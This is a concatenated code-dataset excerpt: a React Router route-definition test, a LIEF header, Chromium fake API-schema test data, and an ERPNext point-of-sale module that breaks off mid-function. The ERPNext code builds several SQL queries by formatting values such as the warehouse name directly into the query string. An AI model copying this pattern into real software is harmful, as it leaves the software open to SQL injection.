"caseSensitive": undefined,
"file": "routes/home.js",
"id": "routes/home",
"index": undefined,
"parentId": "root",
"path": "/",
},
"routes/inbox": {
"caseSensitive": undefined,
"file": "routes/inbox.js",
"id": "routes/inbox",
"index": undefined,
"parentId": "root",
"path": "inbox",
},
"routes/inbox/$messageId": {
"caseSensitive": undefined,
"file": "routes/inbox/$messageId.js",
"id": "routes/inbox/$messageId",
"index": undefined,
"parentId": "routes/inbox",
"path": ":messageId",
},
"routes/inbox/archive": {
"caseSensitive": undefined,
"file": "routes/inbox/archive.js",
"id": "routes/inbox/archive",
"index": undefined,
"parentId": "routes/inbox",
"path": "archive",
},
"routes/inbox/index": {
"caseSensitive": undefined,
"file": "routes/inbox/index.js",
"id": "routes/inbox/index",
"index": true,
"parentId": "routes/inbox",
"path": "/",
},
}
`);
});
it("works with async data", async () => {
// Read everything *before* calling defineRoutes.
let fakeDirectory = await Promise.resolve(["one.md", "two.md"]);
let routes = defineRoutes((route) => {
for (let file of fakeDirectory) {
route(file.replace(/\.md$/, ""), file);
}
});
expect(routes).toMatchInlineSnapshot(`
{
"one": {
"caseSensitive": undefined,
"file": "one.md",
"id": "one",
"index": undefined,
"parentId": "root",
"path": "one",
},
"two": {
"caseSensitive": undefined,
"file": "two.md",
"id": "two",
"index": undefined,
"parentId": "root",
"path": "two",
},
}
`);
});
it("allows multiple routes with the same route module", () => {
let routes = defineRoutes((route) => {
route("/user/:id", "routes/_index.tsx", { id: "user-by-id" });
route("/user", "routes/_index.tsx", { id: "user" });
route("/other", "routes/other-route.tsx");
});
expect(routes).toMatchInlineSnapshot(`
{
"routes/other-route": {
"caseSensitive": undefined,
"file": "routes/other-route.tsx",
"id": "routes/other-route",
"index": undefined,
"parentId": "root",
"path": "/other",
},
"user": {
"caseSensitive": undefined,
"file": "routes/_index.tsx",
"id": "user",
"index": undefined,
"parentId": "root",
"path": "/user",
},
"user-by-id": {
"caseSensitive": undefined,
"file": "routes/_index.tsx",
"id": "user-by-id",
"index": undefined,
"parentId": "root",
"path": "/user/:id",
},
}
`);
});
it("throws an error on route id collisions", () => {
// Two conflicting custom id's
let defineNonUniqueRoutes = () => {
defineRoutes((route) => {
route("/user/:id", "routes/user.tsx", { id: "user" });
route("/user", "routes/user.tsx", { id: "user" });
route("/other", "routes/other-route.tsx");
});
};
expect(defineNonUniqueRoutes).toThrowErrorMatchingInlineSnapshot(
`"Unable to define routes with duplicate route id: "user""`,
);
// Custom id conflicting with a later-defined auto-generated id
defineNonUniqueRoutes = () => {
defineRoutes((route) => {
route("/user/:id", "routes/user.tsx", { id: "routes/user" });
route("/user", "routes/user.tsx");
});
};
expect(defineNonUniqueRoutes).toThrowErrorMatchingInlineSnapshot(
`"Unable to define routes with duplicate route id: "routes/user""`,
);
// Custom id conflicting with an earlier-defined auto-generated id
defineNonUniqueRoutes = () => {
defineRoutes((route) => {
route("/user", "routes/user.tsx");
route("/user/:id", "routes/user.tsx", { id: "routes/user" });
});
};
expect(defineNonUniqueRoutes).toThrowErrorMatchingInlineSnapshot(
`"Unable to define routes with duplicate route id: "routes/user""`,
);
});
});
|
typescript
|
github
|
https://github.com/remix-run/react-router
|
packages/react-router-remix-routes-option-adapter/__tests__/defineRoutes-test.ts
|
/* Copyright 2017 - 2025 R. Thomas
* Copyright 2017 - 2025 Quarkslab
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef LIEF_PE_SIGNATURE_TYPES_H
#define LIEF_PE_SIGNATURE_TYPES_H
#include <string>
namespace LIEF {
namespace PE {
using oid_t = std::string;
}
}
#endif
|
unknown
|
github
|
https://github.com/nodejs/node
|
deps/LIEF/include/LIEF/PE/signature/types.hpp
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
from extensions_paths import CHROME_EXTENSIONS
from test_file_system import MoveAllTo
from test_util import ReadFile
FAKE_TABS_IDL = '\n'.join([
'// Copyleft stuff.',
'',
'// Some description here.',
'namespace fakeTabs {',
' dictionary WasImplicitlyInlinedType {};',
' interface Functions {',
' static void myFunc(WasImplicitlyInlinedType arg);',
' static void anotherFunc(WasImplicitlyInlinedType arg);',
' };',
'};'])
FAKE_TABS_WITH_INLINING_IDL = '\n'.join([
'// Copyleft stuff.',
'',
'// Some description here.',
'namespace fakeTabs {',
' dictionary WasImplicitlyInlinedType {};',
' interface Functions {',
' static void myFunc(WasImplicitlyInlinedType arg);',
' };',
'};'])
TABS_SCHEMA_BRANCHES = MoveAllTo(CHROME_EXTENSIONS, {
'master': {
'docs': {
'templates': {
'json': {
'api_availabilities.json': json.dumps({
'tabs.fakeTabsProperty4': {
'channel': 'stable',
'version': 27
}
}),
'intro_tables.json': '{}'
}
}
},
'api': {
'_api_features.json': json.dumps({
'tabs.scheduledFunc': {
'channel': 'stable'
}
}),
'_manifest_features.json': '{}',
'_permission_features.json': '{}',
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'type': 'any',
'properties': {
'url': {
'type': 'any'
},
'index': {
'type': 'any'
},
'selected': {
'type': 'any'
},
'id': {
'type': 'any'
},
'windowId': {
'type': 'any'
}
}
},
{
'id': 'InlinedType',
'type': 'any',
'inline_doc': True
},
{
'id': 'InjectDetails',
'type': 'any',
'properties': {
'allFrames': {
'type': 'any'
},
'code': {
'type': 'any'
},
'file': {
'type':'any'
}
}
},
{
'id': 'DeprecatedType',
'type': 'any',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {
'type': 'any'
},
'fakeTabsProperty2': {
'type': 'any'
},
'fakeTabsProperty3': {
'type': 'any'
},
'fakeTabsProperty4': {
'type': 'any'
}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'type': 'function',
'parameters': [
{
'name': 'tab',
'type': 'any'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'type': 'function',
'parameters': [
{
'name': 'tab',
'type': 'any'
}
]
},
{
'name': 'tabId',
'type': 'any'
}
]
},
{
'name': 'restrictedFunc'
},
{
'name': 'scheduledFunc',
'parameters': []
}
],
'events': [
{
'name': 'onActivated',
'type': 'event',
'parameters': [
{
'name': 'activeInfo',
'type': 'any',
'properties': {
'tabId': {
'type': 'any'
},
'windowId': {
'type': 'any'
}
}
}
]
},
{
'name': 'onUpdated',
'type': 'event',
'parameters': [
{
'name': 'tabId',
'type': 'any'
},
{
'name': 'tab',
'type': 'any'
},
{
'name': 'changeInfo',
'type': 'any',
'properties': {
'pinned': {
'type': 'any'
},
'status': {
'type': 'any'
}
}
}
]
}
]
}])
}
},
'1612': {
'api': {
'_api_features.json': json.dumps({
'tabs.scheduledFunc': {
'channel': 'stable'
}
}),
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
},
{
'id': 'DeprecatedType',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
{
'name': 'tabId'
}
]
},
{
'name': 'restrictedFunc'
},
{
'name': 'scheduledFunc',
'parameters': []
}
],
'events': [
{
'name': 'onActivated',
'parameters': [
{
'name': 'activeInfo',
'properties': {
'tabId': {},
'windowId': {}
}
}
]
},
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'tab'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1599': {
'api': {
'_api_features.json': "{}",
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
},
{
'id': 'DeprecatedType',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
{
'name': 'tabId'
}
]
},
{
'name': 'restrictedFunc'
}
],
'events': [
{
'name': 'onActivated',
'parameters': [
{
'name': 'activeInfo',
'properties': {
'tabId': {},
}
}
]
},
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1547': {
'api': {
'_api_features.json': json.dumps({
'tabs.restrictedFunc': {
'channel': 'dev'
}
}),
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
'code': {},
'file': {}
}
},
{
'id': 'DeprecatedType',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
]
},
{
'name': 'restrictedFunc'
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1500': {
'api': {
'_api_features.json': "{}",
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
}
},
{
'id': 'DeprecatedType',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1453': {
'api': {
'_api_features.json': "{}",
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
}
},
{
'id': 'DeprecatedType',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
},
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1410': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {},
}
},
{
'id': 'DeprecatedType',
'deprecated': 'This is deprecated'
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1364': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'fake_tabs.idl': FAKE_TABS_WITH_INLINING_IDL,
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
},
{
'id': 'InjectDetails',
'properties': {
'allFrames': {}
}
},
{
'id': 'DeprecatedType',
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1312': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1271': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1229': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {},
'windowId': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1180': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'selected': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1132': {
'api': {
'_manifest_features.json': "{}",
'_permission_features.json': "{}",
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1084': {
'api': {
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'getCurrent',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
},
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'1025': {
'api': {
'tabs.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'index': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'963': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
},
{
'name': 'changeInfo',
'properties': {
'pinned': {},
'status': {}
}
}
]
}
]
}])
}
},
'912': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
}
]
}
]
}])
}
},
'874': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {},
'fakeTabsProperty2': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
}
]
}
]
}])
}
},
'835': {
'api': {
'extension_api.json': json.dumps([{
'namespace': 'tabs',
'types': [
{
'id': 'Tab',
'properties': {
'url': {},
'id': {}
}
}
],
'properties': {
'fakeTabsProperty1': {}
},
'functions': [
{
'name': 'get',
'parameters': [
{
'name': 'callback',
'parameters': [
{
'name': 'tab'
}
]
}
]
}
],
'events': [
{
'name': 'onUpdated',
'parameters': [
{
'name': 'tabId'
}
]
}
]
}])
}
},
'782': {
'api': {
'extension_api.json': "{}"
}
}
})
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe, json
from frappe import _
from frappe.utils import nowdate
from erpnext.setup.utils import get_exchange_rate
from erpnext.stock.get_item_details import get_pos_profile
from erpnext.accounts.party import get_party_account_currency
from erpnext.controllers.accounts_controller import get_taxes_and_charges
@frappe.whitelist()
def get_pos_data():
doc = frappe.new_doc('Sales Invoice')
doc.is_pos = 1;
pos_profile = get_pos_profile(doc.company) or {}
if not doc.company: doc.company = pos_profile.get('company')
doc.update_stock = pos_profile.get('update_stock')
if pos_profile.get('name'):
pos_profile = frappe.get_doc('POS Profile', pos_profile.get('name'))
company_data = get_company_data(doc.company)
update_pos_profile_data(doc, pos_profile, company_data)
update_multi_mode_option(doc, pos_profile)
default_print_format = pos_profile.get('print_format') or "Point of Sale"
print_template = frappe.db.get_value('Print Format', default_print_format, 'html')
return {
'doc': doc,
'default_customer': pos_profile.get('customer'),
'items': get_items_list(pos_profile),
'customers': get_customers_list(pos_profile),
'serial_no_data': get_serial_no_data(pos_profile, doc.company),
'batch_no_data': get_batch_no_data(),
'tax_data': get_item_tax_data(),
'price_list_data': get_price_list_data(doc.selling_price_list),
'bin_data': get_bin_data(pos_profile),
'pricing_rules': get_pricing_rule_data(doc),
'print_template': print_template,
'pos_profile': pos_profile,
'meta': {
'invoice': frappe.get_meta('Sales Invoice'),
'items': frappe.get_meta('Sales Invoice Item'),
'taxes': frappe.get_meta('Sales Taxes and Charges')
}
}
def get_company_data(company):
return frappe.get_all('Company', fields = ["*"], filters= {'name': company})[0]
def update_pos_profile_data(doc, pos_profile, company_data):
doc.campaign = pos_profile.get('campaign')
doc.write_off_account = pos_profile.get('write_off_account') or \
company_data.write_off_account
doc.change_amount_account = pos_profile.get('change_amount_account') or \
company_data.default_cash_account
doc.taxes_and_charges = pos_profile.get('taxes_and_charges')
if doc.taxes_and_charges:
update_tax_table(doc)
doc.currency = pos_profile.get('currency') or company_data.default_currency
doc.conversion_rate = 1.0
if doc.currency != company_data.default_currency:
doc.conversion_rate = get_exchange_rate(doc.currency, company_data.default_currency)
doc.selling_price_list = pos_profile.get('selling_price_list') or \
frappe.db.get_value('Selling Settings', None, 'selling_price_list')
doc.naming_series = pos_profile.get('naming_series') or 'SINV-'
doc.letter_head = pos_profile.get('letter_head') or company_data.default_letter_head
doc.ignore_pricing_rule = pos_profile.get('ignore_pricing_rule') or 0
doc.apply_discount_on = pos_profile.get('apply_discount_on') if pos_profile.get('apply_discount') else ''
doc.customer_group = pos_profile.get('customer_group') or get_root('Customer Group')
doc.territory = pos_profile.get('territory') or get_root('Territory')
def get_root(table):
root = frappe.db.sql(""" select name from `tab%(table)s` having
min(lft)"""%{'table': table}, as_dict=1)
return root[0].name
def update_multi_mode_option(doc, pos_profile):
from frappe.model import default_fields
if not pos_profile or not pos_profile.get('payments'):
for payment in get_mode_of_payment(doc):
payments = doc.append('payments', {})
payments.mode_of_payment = payment.parent
payments.account = payment.default_account
payments.type = payment.type
return
for payment_mode in pos_profile.payments:
payment_mode = payment_mode.as_dict()
for fieldname in default_fields:
if fieldname in payment_mode:
del payment_mode[fieldname]
doc.append('payments', payment_mode)
def get_mode_of_payment(doc):
return frappe.db.sql(""" select mpa.default_account, mpa.parent, mp.type as type from `tabMode of Payment Account` mpa,
`tabMode of Payment` mp where mpa.parent = mp.name and mpa.company = %(company)s""", {'company': doc.company}, as_dict=1)
def update_tax_table(doc):
taxes = get_taxes_and_charges('Sales Taxes and Charges Template', doc.taxes_and_charges)
for tax in taxes:
doc.append('taxes', tax)
def get_items_list(pos_profile):
cond = "1=1"
item_groups = []
if pos_profile.get('item_groups'):
# Get items based on the item groups defined in the POS profile
cond = "item_group in (%s)"%(', '.join(['%s']*len(pos_profile.get('item_groups'))))
item_groups = [d.item_group for d in pos_profile.get('item_groups')]
return frappe.db.sql("""
select
name, item_code, item_name, description, item_group, expense_account, has_batch_no,
has_serial_no, expense_account, selling_cost_center, stock_uom, image,
default_warehouse, is_stock_item
from
tabItem
where
disabled = 0 and has_variants = 0 and is_sales_item = 1 and {cond}
""".format(cond=cond), tuple(item_groups), as_dict=1)
def get_customers_list(pos_profile):
cond = "1=1"
customer_groups = []
if pos_profile.get('customer_groups'):
# Get customers based on the customer groups defined in the POS profile
cond = "customer_group in (%s)"%(', '.join(['%s']*len(pos_profile.get('customer_groups'))))
customer_groups = [d.customer_group for d in pos_profile.get('customer_groups')]
return frappe.db.sql(""" select name, customer_name, customer_group,
territory from tabCustomer where disabled = 0
and {cond}""".format(cond=cond), tuple(customer_groups), as_dict=1) or {}
def get_serial_no_data(pos_profile, company):
# get itemwise serial no data
# example {'Nokia Lumia 1020': {'SN0001': 'Pune'}}
# where Nokia Lumia 1020 is item code, SN0001 is serial no and Pune is warehouse
cond = "1=1"
if pos_profile.get('update_stock') and pos_profile.get('warehouse'):
cond = "warehouse = '{0}'".format(pos_profile.get('warehouse'))
serial_nos = frappe.db.sql("""select name, warehouse, item_code from `tabSerial No` where {0}
and company = %(company)s """.format(cond), {'company': company}, as_dict=1)
itemwise_serial_no = {}
for sn in serial_nos:
if sn.item_code not in itemwise_serial_no:
itemwise_serial_no.setdefault(sn.item_code, {})
itemwise_serial_no[sn.item_code][sn.name] = sn.warehouse
return itemwise_serial_no
def get_batch_no_data():
# get itemwise batch no data
# exmaple: {'LED-GRE': [Batch001, Batch002]}
# where LED-GRE is item code, SN0001 is serial no and Pune is warehouse
itemwise_batch = {}
batches = frappe.db.sql("""select name, item from `tabBatch`
where ifnull(expiry_date, '4000-10-10') >= curdate()""", as_dict=1)
for batch in batches:
if batch.item not in itemwise_batch:
itemwise_batch.setdefault(batch.item, [])
itemwise_batch[batch.item].append(batch.name)
return itemwise_batch
def get_item_tax_data():
# get default tax of an item
# example: {'Consulting Services': {'Excise 12 - TS': '12.000'}}
itemwise_tax = {}
taxes = frappe.db.sql(""" select parent, tax_type, tax_rate from `tabItem Tax`""", as_dict=1)
for tax in taxes:
if tax.parent not in itemwise_tax:
itemwise_tax.setdefault(tax.parent, {})
itemwise_tax[tax.parent][tax.tax_type] = tax.tax_rate
return itemwise_tax
def get_price_list_data(selling_price_list):
itemwise_price_list = {}
price_lists = frappe.db.sql("""Select ifnull(price_list_rate, 0) as price_list_rate,
item_code from `tabItem Price` ip where price_list = %(price_list)s""",
{'price_list': selling_price_list}, as_dict=1)
for item in price_lists:
itemwise_price_list[item.item_code] = item.price_list_rate
return itemwise_price_list
def get_bin_data(pos_profile):
itemwise_bin_data = {}
cond = "1=1"
if pos_profile.get('warehouse'):
cond = "warehouse = '{0}'".format(pos_profile.get('warehouse'))
bin_data = frappe.db.sql(""" select item_code, warehouse, actual_qty from `tabBin`
where actual_qty > 0 and {cond}""".format(cond=cond), as_dict=1)
for bins in bin_data:
if bins.item_code not in itemwise_bin_data:
itemwise_bin_data.setdefault(bins.item_code, {})
itemwise_bin_data[bins.item_code][bins.warehouse] = bins.actual_qty
return itemwise_bin_data
def get_pricing_rule_data(doc):
pricing_rules = ""
if doc.ignore_pricing_rule == 0:
pricing_rules = frappe.db.sql(""" Select * from `tabPricing Rule` where docstatus < 2
and ifnull(for_price_list, '') in (%(price_list)s, '') and selling = 1
and ifnull(company, '') in (%(company)s, '') and disable = 0 and %(date)s
between ifnull(valid_from, '2000-01-01') and ifnull(valid_upto, '2500-12-31')
order by priority desc, name desc""",
{'company': doc.company, 'price_list': doc.selling_price_list, 'date': nowdate()}, as_dict=1)
return pricing_rules
@frappe.whitelist()
def make_invoice(doc_list):
if isinstance(doc_list, basestring):
doc_list = json.loads(doc_list)
name_list = []
for docs in doc_list:
for name, doc in docs.items():
if not frappe.db.exists('Sales Invoice',
{'offline_pos_name': name, 'docstatus': ("<", "2")}):
validate_records(doc)
si_doc = frappe.new_doc('Sales Invoice')
si_doc.offline_pos_name = name
si_doc.update(doc)
submit_invoice(si_doc, name)
name_list.append(name)
else:
name_list.append(name)
return name_list
def validate_records(doc):
validate_customer(doc)
validate_item(doc)
def validate_customer(doc):
if not frappe.db.exists('Customer', doc.get('customer')):
customer_doc = frappe.new_doc('Customer')
customer_doc.customer_name = doc.get('customer')
customer_doc.customer_type = 'Company'
customer_doc.customer_group = doc.get('customer_group')
customer_doc.territory = doc.get('territory')
